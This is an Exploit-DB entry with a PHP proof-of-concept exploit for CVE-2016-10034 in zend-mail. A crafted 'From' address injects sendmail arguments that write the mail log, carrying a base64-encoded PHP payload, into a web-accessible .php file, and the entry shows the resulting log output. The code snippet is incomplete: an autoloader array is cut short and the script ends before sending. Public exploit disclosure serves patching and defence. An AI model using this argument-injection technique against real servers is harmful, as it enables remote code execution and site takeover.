Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

ID EDB-ID:40979
Type exploitdb
Reporter Exploit-DB
Modified 2016-12-30T00:00:00


Zend Framework / zend-mail < 2.4.11 - Remote Code Execution. CVE-2016-10034. Webapps exploit for PHP platform

Zend Framework &lt; 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail &lt; 2.4.11 
zend-mail &lt; 2.7.2 
Discovered/Coded by:
Dawid Golunski
Full Advisory URL:

Video PoC

Follow the feed for updates:


A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]

which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
09607 &lt;&lt;&lt; Content-Type: text/html; charset=us-ascii
09607 &lt;&lt;&lt; 
09607 &lt;&lt;&lt; &lt;?php phpinfo(); ?&gt;
09607 &lt;&lt;&lt; 
09607 &lt;&lt;&lt; 
09607 &lt;&lt;&lt; 
See the full advisory URL for the exploit details.
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");

// ------------------
// mail() param injection via the vulnerability in zend-mail

include 'vendor/Zend/Loader/AutoloaderFactory.php';

        'Zend\Loader\StandardAutoloader' =&gt; array(
                'autoregister_zf' =&gt; true

Zend\Mvc\Application::init(require 'config/application.php')-&gt;run();

$message        = new \Zend\Mail\Message();

$message-&gt;setFrom($email_from, 'Attacker');
$message-&gt;addTo('support@localhost', 'Support');
$message-&gt;setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();